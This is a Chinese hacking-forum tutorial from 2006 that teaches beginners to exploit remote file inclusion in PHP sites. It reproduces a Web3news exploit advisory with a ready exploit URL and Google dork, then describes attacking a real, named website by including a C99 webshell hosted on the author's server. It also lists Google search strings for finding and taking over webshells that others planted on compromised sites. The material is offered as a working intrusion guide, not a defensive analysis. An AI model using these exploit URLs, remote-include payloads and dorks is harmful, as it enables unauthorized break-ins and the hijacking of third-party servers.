信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章属性:漏洞利用
原文作者:独孤依人[SST]
发布时间:2006-09-08
关键字:包含漏洞 社会工程学 Google hack
注:首发于脚本安全小组(http://www.cnsst.net/)内部交流版块,现友情提交到邪八论坛。写得很随意,旨在给新手朋友对国外WEB漏洞的利用做个引导,学会举一反三,思路扩展。文章虽然简单,转载还望注明出处。
我们先来看看远程文件包含漏洞的原理:
假设http://www.XXX.com/主页文件index.php的代码如下:
<?
include($page);
?>
由于$page变量缺少充分过滤,没有判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量, 让以web权限执行我们的远程文件.
这样我们可以提交:
http://www.XXX.com/index.php?page=http://远程服务器/文件名称
我们只要把远程文件设为我们的PHP木马,这样就可以得到一个Webshell。
看完了漏洞的原理,我们来看看相关漏洞的介绍:
进入http://www.cnsst.net/forum/thread.php?fid=20会看到很Remote Include Vulnerability的漏洞公告,随便点击个http://www.cnsst.net/forum/read.php?tid=22看到如下漏洞简介:
Web3news <= 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln
#=====================================================================
#Web3news <= v0.95 (PHPSECURITYADMIN_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.web3king.com/web3news
#
#Version : All Versions
#
#======================================================================
#Bug in : security/include/_class.security.php
#
#Vlu Code :
#--------------------------------
# <?
# include $PHPSECURITYADMIN_PATH."lang/".$lang.".lang.php";
#
#
#=======================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?
#
#Example : http://www.web3king.com/web3news/ ======> Vendor site
#
#DOrk : allinurl : /web3news/
#======================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
===========================================================================
我们注重看这段代码:
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?
#
#Example : http://www.web3king.com/web3news/ ======> Vendor site
#
#DOrk : allinurl : /web3news/
简单说下意思:
Dork,我们常说的Google的关键字,也就是说我们只要在Google搜索allinurl : /web3news/,就可以得到些有漏洞的URL。
Example,他给举的一个例子,也就是说如果URL符合http://www.web3king.com/web3news/ 这个格式,我们就可以来利用它。
Exploit,溢出过的朋友可能就很清楚了,也就是我们常说的EXP,在这里的意思是把http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?中的http://sitename.com/[Script Path]/换成http://www.web3king.com/web3news/(我们找到有漏洞的URL)即可得到一个Webshell,当然得先准备一个SHell放到远程机器上,我已经准备好了一个C99修改版的PHPSHell,连接:http://www.cnsst.net/99.txt
好了,大概明白了利用的过程,我们现在就去入侵吧。
首先进Google搜索关键字:allinurl : /web3news/,会看到很多连接,很多都被人利用了,好不容易找了一个http://www.geipeg.com/web3news/来做演示,我们直接在他的URL后面加上EXP代码得到http://www.geipeg.com/web3news/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.cnsst.net/99.txt?,然后提交就得到一个Webshll如图(1):
http://www.cnsst.net/99.txt是我们事先上传好的PHPshell。文件包含漏洞大概利用过程就这样了,这个web3news漏洞现在被得利用得差不多了,大家可以测试下其它的相关漏洞,我测试了几个最新都成功了。
在上面我们利用的C99的PHPshell,这是一种免登录的PHPSHELL,在搜索的时候,我发现很多都被老外利用了,这个马在国外也比较流行,所以我当时就想通过搜索C99的PHPshell的关键字或许可以得到些Shell,于是总结了下关键字,在Google搜索:
"php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"
很多都失效了,但还是找到了一个如图(2):
点击进去,果然是一个C99的PHPShell,如图(3):
结果不是很理想,但至少证明这种方法是可以得到Webshell的,可能是我的关键字总结得不好,于是又观察了下C99的Shell,
看到很多C99的SHell标题后有- phpshell,好了,这样我们可以构造“intitle:.com - phpshell”关键字,我们去Google搜索下,果然不出所料,第一页就弄了好几个,当然我们还可以把com改成net,org,cn,jp,at等。
既然C99的PHPshell可以用Google去搜索,那其它的SHell呢?当然是可以了,于是我又想到了去搜索些国外比较流行的PHPSHell,我就拿R57shell为例,直接在Google搜索关键字:intitle:r57shell +uname,剩下的大家都知道,我也不说了。
没有什么技术可言,重要的是思路,希望大家学会举一反三,有时会得到意想不到的结果。
[attachment=7903]
[attachment=7904]
[attachment=7905]
当前位置:
